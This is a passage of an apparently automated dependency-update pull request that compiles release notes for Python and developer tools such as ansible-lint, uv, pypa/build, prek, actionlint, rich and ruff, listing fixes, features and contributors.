##### Features
- feat: add jinja2-template-extension opt-in rule
([#​4979](https://redirect.github.com/ansible/ansible-lint/issues/4979))
[@​djdanielsson](https://redirect.github.com/djdanielsson)
##### Fixes
- fix: Add missing version\_changed var to ComplexityRule class
([#​4987](https://redirect.github.com/ansible/ansible-lint/issues/4987))
[@​thrashwerk](https://redirect.github.com/thrashwerk)
##### Maintenance
- chore: pre-commit autoupdate
([#​4986](https://redirect.github.com/ansible/ansible-lint/issues/4986))
@​[pre-commit-ci\[bot\]](https://redirect.github.com/apps/pre-commit-ci)
- chore(deps): update all dependencies pep621
([#​4984](https://redirect.github.com/ansible/ansible-lint/issues/4984))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​4983](https://redirect.github.com/ansible/ansible-lint/issues/4983))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps-dev): bump minimatch from 9.0.5 to 10.2.4 in /test/schemas
([#​4982](https://redirect.github.com/ansible/ansible-lint/issues/4982))
@​[dependabot\[bot\]](https://redirect.github.com/apps/dependabot)
</details>
<details>
<summary>ansible/team-devtools (ansible/team-devtools)</summary>
### [`v26.4.0`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.4.0)
[Compare Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.2...v26.4.0)
#### Fixes
- fix: stop if unsigned commits are detected
([#​438](https://redirect.github.com/ansible/team-devtools/issues/438))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update pep621
([#​432](https://redirect.github.com/ansible/team-devtools/issues/432))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v26.2.2`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.2.2)
[Compare Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.1...v26.2.2)
#### Maintenance
- chore: dump event info for test pipeline
([#​427](https://redirect.github.com/ansible/team-devtools/issues/427))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- chore(deps): update all dependencies
([#​426](https://redirect.github.com/ansible/team-devtools/issues/426))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v26.2.1`](https://redirect.github.com/ansible/team-devtools/releases/tag/v26.2.1)
[Compare Source](https://redirect.github.com/ansible/team-devtools/compare/v26.2.0...v26.2.1)
#### Fixes
- fix: make slack notification use markdown
([#​424](https://redirect.github.com/ansible/team-devtools/issues/424))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: make slack alert easier to read
([#​423](https://redirect.github.com/ansible/team-devtools/issues/423))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
</details>
<details>
<summary>astral-sh/uv-pre-commit (astral-sh/uv-pre-commit)</summary>
### [`v0.11.8`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.8)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.7...0.11.8)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.8>
### [`v0.11.7`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.7)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.6...0.11.7)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.7>
### [`v0.11.6`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.6)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.5...0.11.6)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.6>
### [`v0.11.5`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.5)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.4...0.11.5)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.5>
### [`v0.11.4`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.4)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.3...0.11.4)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.4>
### [`v0.11.3`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.3)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.2...0.11.3)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.3>
### [`v0.11.2`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.2)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.1...0.11.2)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.2>
### [`v0.11.1`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.1)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.11.0...0.11.1)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.1>
### [`v0.11.0`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.11.0)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.12...0.11.0)
See: <https://github.com/astral-sh/uv/releases/tag/0.11.0>
### [`v0.10.12`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.12)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.11...0.10.12)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.12>
### [`v0.10.11`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.11)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.10...0.10.11)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.11>
### [`v0.10.10`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.10)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.9...0.10.10)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.10>
### [`v0.10.9`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.9)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.8...0.10.9)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.9>
### [`v0.10.8`](https://redirect.github.com/astral-sh/uv-pre-commit/releases/tag/0.10.8)
[Compare Source](https://redirect.github.com/astral-sh/uv-pre-commit/compare/0.10.7...0.10.8)
See: <https://github.com/astral-sh/uv/releases/tag/0.10.8>
</details>
<details>
<summary>biomejs/pre-commit (biomejs/pre-commit)</summary>
### [`v2.4.14`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.13...v2.4.14)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.13...v2.4.14)
### [`v2.4.13`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.12...v2.4.13)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.12...v2.4.13)
### [`v2.4.12`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.11...v2.4.12)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.11...v2.4.12)
### [`v2.4.11`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.10...v2.4.11)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.10...v2.4.11)
### [`v2.4.10`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.9...v2.4.10)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.9...v2.4.10)
### [`v2.4.9`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.8...v2.4.9)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.8...v2.4.9)
### [`v2.4.8`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.7...v2.4.8)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.7...v2.4.8)
### [`v2.4.7`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.6...v2.4.7)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.6...v2.4.7)
### [`v2.4.6`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.5...v2.4.6)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.5...v2.4.6)
### [`v2.4.5`](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.4...v2.4.5)
[Compare Source](https://redirect.github.com/biomejs/pre-commit/compare/v2.4.4...v2.4.5)
</details>
<details>
<summary>pypa/build (build)</summary>
### [`v1.5.0`](https://redirect.github.com/pypa/build/releases/tag/1.5.0)
[Compare Source](https://redirect.github.com/pypa/build/compare/1.4.4...1.5.0)
#### What's Changed
- ci: try to improve release docs by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1051](https://redirect.github.com/pypa/build/pull/1051)
- feat: drop 3.9, require 3.10+ by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1036](https://redirect.github.com/pypa/build/pull/1036)
- chore: tox toml by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1033](https://redirect.github.com/pypa/build/pull/1033)
- fix: api should not ignore installed, only CLI by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1056](https://redirect.github.com/pypa/build/pull/1056)
**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.4...1.5.0>
### [`v1.4.4`](https://redirect.github.com/pypa/build/releases/tag/1.4.4)
[Compare Source](https://redirect.github.com/pypa/build/compare/1.4.3...1.4.4)
#### What's Changed
- 🐛 fix(release): generate consistent CHANGELOG heading levels by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1032](https://redirect.github.com/pypa/build/pull/1032)
- docs: move source links by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1034](https://redirect.github.com/pypa/build/pull/1034)
- revert: drop PEP 660 change by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1039](https://redirect.github.com/pypa/build/pull/1039)
- fix: ignore installed when running pip by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1040](https://redirect.github.com/pypa/build/pull/1040)
- fix: revert part of
[#​973](https://redirect.github.com/pypa/build/issues/973) by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1044](https://redirect.github.com/pypa/build/pull/1044)
- chore: report coverage failure lines by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1046](https://redirect.github.com/pypa/build/pull/1046)
- tests: fix issue with uv run by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1048](https://redirect.github.com/pypa/build/pull/1048)
- docs: reorganize testing docs for copy/paste by
[@​abitrolly](https://redirect.github.com/abitrolly) in
[#​1043](https://redirect.github.com/pypa/build/pull/1043)
- tests: keep environment from leaking in Python 3.15 by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1049](https://redirect.github.com/pypa/build/pull/1049)
- docs: fix issue with changelog generation by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1050](https://redirect.github.com/pypa/build/pull/1050)
**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.3...1.4.4>
### [`v1.4.3`](https://redirect.github.com/pypa/build/releases/tag/1.4.3)
[Compare Source](https://redirect.github.com/pypa/build/compare/1.4.2...1.4.3)
<!-- Release notes generated using configuration in .github/release.yml
at 1.4.3 -->
##### What's Changed
- 🐛 fix(api): resolve thread-safety races in build API by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1015](https://redirect.github.com/pypa/build/pull/1015)
- 🐛 fix(builder): validate backend-path entries exist on disk by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1016](https://redirect.github.com/pypa/build/pull/1016)
- test: cover config settings build paths by
[@​terminalchai](https://redirect.github.com/terminalchai) in
[#​992](https://redirect.github.com/pypa/build/pull/992)
- Add kind=(step, ) for root messages with \* by
[@​abitrolly](https://redirect.github.com/abitrolly) in
[#​973](https://redirect.github.com/pypa/build/pull/973)
- fix: correct changelog category ordering by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1017](https://redirect.github.com/pypa/build/pull/1017)
- 🐛 fix(cli): show full dependency chain in missing deps error by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1019](https://redirect.github.com/pypa/build/pull/1019)
- tests: fully annotate by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1020](https://redirect.github.com/pypa/build/pull/1020)
- chore: lazy imports by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1021](https://redirect.github.com/pypa/build/pull/1021)
- chore: adding more ruff codes by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1022](https://redirect.github.com/pypa/build/pull/1022)
- tests: improve annotations by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1023](https://redirect.github.com/pypa/build/pull/1023)
- 🧪 test(coverage): achieve 100% test coverage by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1018](https://redirect.github.com/pypa/build/pull/1018)
- chore: add ruff PT by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1025](https://redirect.github.com/pypa/build/pull/1025)
- chore: add ruff PYI by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1026](https://redirect.github.com/pypa/build/pull/1026)
- chore: add ruff SIM/RET by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1028](https://redirect.github.com/pypa/build/pull/1028)
- 🐛 fix(env): strip PYTHONPATH from isolated builds by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1024](https://redirect.github.com/pypa/build/pull/1024)
- chore: use ruff ALL by
[@​henryiii](https://redirect.github.com/henryiii) in
[#​1029](https://redirect.github.com/pypa/build/pull/1029)
- 🐛 fix(env): prevent pip credential hang with private indexes by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1030](https://redirect.github.com/pypa/build/pull/1030)
- 🐛 fix(check_dependency): verify URL reqs via PEP 610 by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[#​1027](https://redirect.github.com/pypa/build/pull/1027)
##### New Contributors
- [@​terminalchai](https://redirect.github.com/terminalchai) made
their first contribution in
[#​992](https://redirect.github.com/pypa/build/pull/992)
**Full Changelog**:
<https://github.com/pypa/build/compare/1.4.2...1.4.3>
</details>
<details>
<summary>pallets/click (click)</summary>
### [`v8.3.3`](https://redirect.github.com/pallets/click/compare/8.3.2...8.3.3)
[Compare Source](https://redirect.github.com/pallets/click/compare/8.3.2...8.3.3)
</details>
<details>
<summary>tox-dev/py-filelock (filelock)</summary>
### [`v3.29.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.29.0)
[Compare Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.28.0...3.29.0)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.29.0 -->
#### What's Changed
- 🐛 fix(async): use single-thread executor for lock consistency by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#533](https://redirect.github.com/tox-dev/filelock/pull/533)
- ✨ feat(soft): enable stale lock detection on Windows by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#534](https://redirect.github.com/tox-dev/filelock/pull/534)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.28.0...3.29.0>
### [`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)
[Compare Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)
<!-- Release notes generated using configuration in .github/release.yaml
at 3.28.0 -->
##### What's Changed
- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by
[@​gaborbernat](https://redirect.github.com/gaborbernat) in
[tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)
**Full Changelog**:
<https://github.com/tox-dev/filelock/compare/3.27.0...3.28.0>
</details>
<details>
<summary>j178/prek (prek)</summary>
### [`v0.3.11`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#0311)
Released on 2026-04-27.
##### Highlights
Hook entries now have an explicit `shell` option for shell snippets. Set
`shell: sh`, `bash`, `pwsh`, `powershell`, or `cmd` when an entry should
be evaluated by that shell; leaving it unset keeps prek's direct argv
execution.

`prek auto-update` can now filter tag candidates before choosing an
update. Both options take glob patterns: use `--include-tag` to only
consider matching tag names, and `--exclude-tag` to skip matching tags
such as moving tags or prereleases.
##### Enhancements
- Add `auto-update --exclude-repo <repo>` to skip repos
([#​1983](https://redirect.github.com/j178/prek/pull/1983))
- Add `auto-update --exit-code` to exit with non-zero on updates
([#​2002](https://redirect.github.com/j178/prek/pull/2002))
- Add `auto-update --include-tag <pattern>`/`--exclude-tag <pattern>` to
filter tags
([#​1984](https://redirect.github.com/j178/prek/pull/1984))
- Adds an explicit `shell` hook option for entries that should run as
shell source
([#​2004](https://redirect.github.com/j178/prek/pull/2004))
- Make `--hook-dir` optional for hook-impl
([#​1989](https://redirect.github.com/j178/prek/pull/1989))
- Skip shim warning when `--script-version` is missing
([#​1990](https://redirect.github.com/j178/prek/pull/1990))
##### Bug fixes
- Install Ruby executable in gem bin
([#​2017](https://redirect.github.com/j178/prek/pull/2017))
- Use dedicated Android npm package
([#​1982](https://redirect.github.com/j178/prek/pull/1982))
- Use stable repo keys without breaking cached clones
([#​1995](https://redirect.github.com/j178/prek/pull/1995))
##### Documentation
- Explain prek name
([#​1980](https://redirect.github.com/j178/prek/pull/1980))
- Clarify `pass_filenames` concurrency docs
([#​1999](https://redirect.github.com/j178/prek/pull/1999))
- Reorganize documentation references
([#​2005](https://redirect.github.com/j178/prek/pull/2005))
- Clarify hook author manifest env docs
([#​1991](https://redirect.github.com/j178/prek/pull/1991))
- docs: add Sentry to users list
([#​1981](https://redirect.github.com/j178/prek/pull/1981))
##### Contributors
- [@​j178](https://redirect.github.com/j178)
### [`v0.3.10`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#0310)
Released on 2026-04-21.
##### Enhancements
- Disallow rev for non-remote repos in schema
([#​1964](https://redirect.github.com/j178/prek/pull/1964))
- Hide up-to-date output in non-verbose mode
([#​1942](https://redirect.github.com/j178/prek/pull/1942))
- Improve merge conflict marker detection
([#​1937](https://redirect.github.com/j178/prek/pull/1937))
- Keep finished hooks visible
([#​1967](https://redirect.github.com/j178/prek/pull/1967))
- Preserve frozen comment spacing in auto-update
([#​1945](https://redirect.github.com/j178/prek/pull/1945))
- Reimplement `@j178/prek` npm package
([#​1973](https://redirect.github.com/j178/prek/pull/1973))
##### Bug fixes
- Prefer stable Rust toolchains
([#​1974](https://redirect.github.com/j178/prek/pull/1974))
##### Documentation
- Add `SKILL.md` for prek
([#​1950](https://redirect.github.com/j178/prek/pull/1950))
- Document `gh skill install j178/prek prek` to install prek skill for
agents ([#​1951](https://redirect.github.com/j178/prek/pull/1951))
- Improve compatibility and migration docs
([#​1940](https://redirect.github.com/j178/prek/pull/1940))
##### Other changes
- Sync latest identify tags
([#​1947](https://redirect.github.com/j178/prek/pull/1947))
##### Contributors
- [@​github-actions](https://redirect.github.com/github-actions)
- [@​renovate](https://redirect.github.com/renovate)
- [@​j178](https://redirect.github.com/j178)
### [`v0.3.9`](https://redirect.github.com/j178/prek/blob/HEAD/CHANGELOG.md#039)
Released on 2026-04-13.
##### Highlight
`prek auto-update` is now stricter about pinned revisions and more
useful in CI.
It now keeps `rev` and `# frozen:` comments in sync, can detect
[impostor commits](https://docs.zizmor.sh/audits/#impostor-commit) when
validating pinned SHAs,
and lets you use `prek auto-update --check` to fail on both available
updates and frozen-ref
mismatches without rewriting the config.
Examples:
```console
$ prek auto-update
# updates revs and repairs stale `# frozen:` comments
$ prek auto-update --freeze
# writes frozen SHAs with matching `# frozen: <tag>` comments
$ prek auto-update --check
# exits non-zero when updates are available, a `# frozen:` comment is stale,
# or a pinned SHA does not belong to the fetched upstream refs
```
##### Enhancements
- Check and sync frozen comments during auto-update
([#​1896](https://redirect.github.com/j178/prek/pull/1896))
- Handle impostor commits in auto-update
([#​1919](https://redirect.github.com/j178/prek/pull/1919))
- Add experimental `language: dotnet` support
([#​1871](https://redirect.github.com/j178/prek/pull/1871))
- Honor repo and worktree `core.hooksPath`
([#​1892](https://redirect.github.com/j178/prek/pull/1892))
- Add `prek run --no-fail-fast` to override config file
([#​1859](https://redirect.github.com/j178/prek/pull/1859))
- Add `forbid-new-submodules` as builtin hook
([#​1853](https://redirect.github.com/j178/prek/pull/1853))
- Clean stale patch files in `cache gc`
([#​1877](https://redirect.github.com/j178/prek/pull/1877))
- Display auto-update results by config entry
([#​1922](https://redirect.github.com/j178/prek/pull/1922))
- Restrict patch directory permissions
([#​1876](https://redirect.github.com/j178/prek/pull/1876))
- Show tag names in `auto-update --freeze` output
([#​1916](https://redirect.github.com/j178/prek/pull/1916))
- Use a bitset for hook stages
([#​1860](https://redirect.github.com/j178/prek/pull/1860))
##### Bug fixes
- Canonicalize CWD and GIT_ROOT paths
([#​1878](https://redirect.github.com/j178/prek/pull/1878))
- Ensure quotes are added for non-string revisions in `auto-update`
([#​1936](https://redirect.github.com/j178/prek/pull/1936))
##### Documentation
- Update docs for case of hooks modifying files with a non-zero exit
code ([#​1879](https://redirect.github.com/j178/prek/pull/1879))
##### Contributors
- [@​RicardoVercetti](https://redirect.github.com/RicardoVercetti)
- [@​nathanjmcdougall](https://redirect.github.com/nathanjmcdougall)
- [@​renovate](https://redirect.github.com/renovate)
- [@​sadjow](https://redirect.github.com/sadjow)
- [@​j178](https://redirect.github.com/j178)
</details>
<details>
<summary>rhysd/actionlint (rhysd/actionlint)</summary>
### [`v1.7.12`](https://redirect.github.com/rhysd/actionlint/blob/HEAD/CHANGELOG.md#v1712---2026-03-30)
[Compare Source](https://redirect.github.com/rhysd/actionlint/compare/v1.7.11...v1.7.12)
- Support the [`timezone` configuration in
`on.schedule`](https://docs.github.com/en/actions/reference/workflows-and-actions/workflow-syntax#onschedule)
with checks for IANA timezone string. See the
[documentation](https://redirect.github.com/rhysd/actionlint/blob/main/docs/checks.md#check-cron-syntax-and-timezone)
for more details. Note that actionlint starts to embed the timezone
database in the executables from this version so the binary sizes
slightly increase.
([#​641](https://redirect.github.com/rhysd/actionlint/issues/641),
thanks
[@​martincostello](https://redirect.github.com/martincostello))
```yaml
on:
  schedule:
    # ERROR: The timezone is not a valid IANA timezone string
    - cron: '*/5 * * * *'
      timezone: 'Asia/Somewhere'
```
- Support the [`jobs.<job_name>.environment.deployment`
configuration](https://docs.github.com/en/actions/how-tos/deploy/configure-and-manage-deployments/control-deployments#using-environments-without-deployments).
([#​639](https://redirect.github.com/rhysd/actionlint/issues/639),
thanks [@​springmeyer](https://redirect.github.com/springmeyer))
- Support the [`macos-26-intel` runner
label](https://github.blog/changelog/2026-02-26-macos-26-is-now-generally-available-for-github-hosted-runners/).
([#​629](https://redirect.github.com/rhysd/actionlint/issues/629),
thanks [@​hugovk](https://redirect.github.com/hugovk))
- Fix the outdated [table of webhook activity
types](https://redirect.github.com/rhysd/actionlint/blob/main/all_webhooks.go)
by rebuilding the [script to scrape the
table](https://redirect.github.com/rhysd/actionlint/tree/main/scripts/generate-webhook-events)
from scratch.
- Support Go 1.26 and drop the support for Go 1.24. Now supported
versions are 1.25 and 1.26.
- Tests are run on arm64 Windows in CI.
- Update the popular actions data set to the latest.
</details>
<details>
<summary>Textualize/rich (rich)</summary>
### [`v15.0.0`](https://redirect.github.com/Textualize/rich/blob/HEAD/CHANGELOG.md#1500---2026-04-12)
[Compare Source](https://redirect.github.com/Textualize/rich/compare/v14.3.4...v15.0.0)
##### Changed
- Breaking change: Dropped support for Python 3.8
##### Fixed
- Fixed empty print ignoring the `end` parameter
[#​4075](https://redirect.github.com/Textualize/rich/pull/4075)
- Fixed `Text.from_ansi` removing newlines
[#​4076](https://redirect.github.com/Textualize/rich/pull/4076)
- Fixed `FileProxy.isatty` not proxying
[#​4077](https://redirect.github.com/Textualize/rich/pull/4077)
- Fixed inline code in Markdown table cells
[#​4079](https://redirect.github.com/Textualize/rich/pull/4079)
### [`v14.3.4`](https://redirect.github.com/Textualize/rich/blob/HEAD/CHANGELOG.md#1434---2026-04-11)
[Compare Source](https://redirect.github.com/Textualize/rich/compare/v14.3.3...v14.3.4)
##### Changed
- Improved import time with lazy loading
[#​4070](https://redirect.github.com/Textualize/rich/pull/4070)
- Changed link id generation to avoid random number generation at
runtime
[#​3845](https://redirect.github.com/Textualize/rich/pull/3845)
</details>
<details>
<summary>astral-sh/ruff (ruff)</summary>
### [`v0.15.12`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01512)
[Compare Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.11...0.15.12)
Released on 2026-04-24.
##### Preview features
- Implement `#ruff:file-ignore` file-level suppressions
([#​23599](https://redirect.github.com/astral-sh/ruff/pull/23599))
- Implement `#ruff:ignore` logical-line suppressions
([#​23404](https://redirect.github.com/astral-sh/ruff/pull/23404))
- Revert preview changes to displayed diagnostic severity in LSP
([#​24789](https://redirect.github.com/astral-sh/ruff/pull/24789))
- \[`airflow`] Implement `task-branch-as-short-circuit` (`AIR004`)
([#​23579](https://redirect.github.com/astral-sh/ruff/pull/23579))
- \[`flake8-bugbear`] Fix `break`/`continue` handling in
`loop-iterator-mutation` (`B909`)
([#​24440](https://redirect.github.com/astral-sh/ruff/pull/24440))
- \[`pylint`] Fix `PLC2701` for type parameter scopes
([#​24576](https://redirect.github.com/astral-sh/ruff/pull/24576))
##### Rule changes
- \[`pandas-vet`] Suggest `.array` as well in `PD011`
([#​24805](https://redirect.github.com/astral-sh/ruff/pull/24805))
##### CLI
- Respect default Unix permissions for cache files
([#​24794](https://redirect.github.com/astral-sh/ruff/pull/24794))
##### Documentation
- \[`pylint`] Fix `PLR0124` description not to claim self-comparison
always returns the same value
([#​24749](https://redirect.github.com/astral-sh/ruff/pull/24749))
- \[`pyupgrade`] Expand docs on reusable `TypeVar`s and scoping
(`UP046`)
([#​24153](https://redirect.github.com/astral-sh/ruff/pull/24153))
- Improve rules table accessibility
([#​24711](https://redirect.github.com/astral-sh/ruff/pull/24711))
##### Contributors
- [@​dylwil3](https://redirect.github.com/dylwil3)
- [@​AlexWaygood](https://redirect.github.com/AlexWaygood)
- [@​woodruffw](https://redirect.github.com/woodruffw)
- [@​avasis-ai](https://redirect.github.com/avasis-ai)
- [@​Dev-iL](https://redirect.github.com/Dev-iL)
- [@​denyszhak](https://redirect.github.com/denyszhak)
- [@​ShipItAndPray](https://redirect.github.com/ShipItAndPray)
- [@​anishgirianish](https://redirect.github.com/anishgirianish)
- [@​augustelalande](https://redirect.github.com/augustelalande)
- [@​amyreese](https://redirect.github.com/amyreese)
- [@​majiayu000](https://redirect.github.com/majiayu000)
### [`v0.15.11`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01511)
[Compare Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.10...0.15.11)
Released on 2026-04-16.
##### Preview features
- \[`ruff`] Ignore `RUF029` when function is decorated with
`asynccontextmanager`
([#​24642](https://redirect.github.com/astral-sh/ruff/pull/24642))
- \[`airflow`] Implement `airflow-xcom-pull-in-template-string`
(`AIR201`)
([#​23583](https://redirect.github.com/astral-sh/ruff/pull/23583))
- \[`flake8-bandit`] Fix `S103` false positives and negatives in mask
analysis
([#​24424](https://redirect.github.com/astral-sh/ruff/pull/24424))
##### Bug fixes
- \[`flake8-async`] Omit overridden methods for `ASYNC109`
([#​24648](https://redirect.github.com/astral-sh/ruff/pull/24648))
##### Documentation
- \[`flake8-async`] Add override mention to `ASYNC109` docs
([#​24666](https://redirect.github.com/astral-sh/ruff/pull/24666))
- Update Neovim config examples to use `vim.lsp.config`
([#​24577](https://redirect.github.com/astral-sh/ruff/pull/24577))
##### Contributors
- [@​augustelalande](https://redirect.github.com/augustelalande)
- [@​anishgirianish](https://redirect.github.com/anishgirianish)
- [@​benberryallwood](https://redirect.github.com/benberryallwood)
- [@​charliermarsh](https://redirect.github.com/charliermarsh)
- [@​Dev-iL](https://redirect.github.com/Dev-iL)
### [`v0.15.10`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01510)
[Compare Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.9...0.15.10)
Released on 2026-04-09.
##### Preview features
- \[`flake8-logging`] Allow closures in except handlers (`LOG004`)
([#​24464](https://redirect.github.com/astral-sh/ruff/pull/24464))
- \[`flake8-self`] Make `SLF` diagnostics robust to non-self-named
variables
([#​24281](https://redirect.github.com/astral-sh/ruff/pull/24281))
- \[`flake8-simplify`] Make the fix for `collapsible-if` safe in
`preview` (`SIM102`)
([#​24371](https://redirect.github.com/astral-sh/ruff/pull/24371))
##### Bug fixes
- Avoid emitting multi-line f-string elements before Python 3.12
([#​24377](https://redirect.github.com/astral-sh/ruff/pull/24377))
- Avoid syntax error from `E502` fixes in f-strings and t-strings
([#​24410](https://redirect.github.com/astral-sh/ruff/pull/24410))
- Strip form feeds from indent passed to `dedent_to`
([#​24381](https://redirect.github.com/astral-sh/ruff/pull/24381))
- \[`pyupgrade`] Fix panic caused by handling of octals (`UP012`)
([#​24390](https://redirect.github.com/astral-sh/ruff/pull/24390))
- Reject multi-line f-string elements before Python 3.12
([#​24355](https://redirect.github.com/astral-sh/ruff/pull/24355))
##### Rule changes
- \[`ruff`] Treat f-string interpolation as potential side effect
(`RUF019`)
([#​24426](https://redirect.github.com/astral-sh/ruff/pull/24426))
##### Server
- Add support for custom file extensions
([#​24463](https://redirect.github.com/astral-sh/ruff/pull/24463))
##### Documentation
- Document adding fixes in CONTRIBUTING.md
([#​24393](https://redirect.github.com/astral-sh/ruff/pull/24393))
- Fix JSON typo in settings example
([#​24517](https://redirect.github.com/astral-sh/ruff/pull/24517))
##### Contributors
- [@​charliermarsh](https://redirect.github.com/charliermarsh)
- [@​dylwil3](https://redirect.github.com/dylwil3)
- [@​silverstein](https://redirect.github.com/silverstein)
- [@​anishgirianish](https://redirect.github.com/anishgirianish)
- [@​shizukushq](https://redirect.github.com/shizukushq)
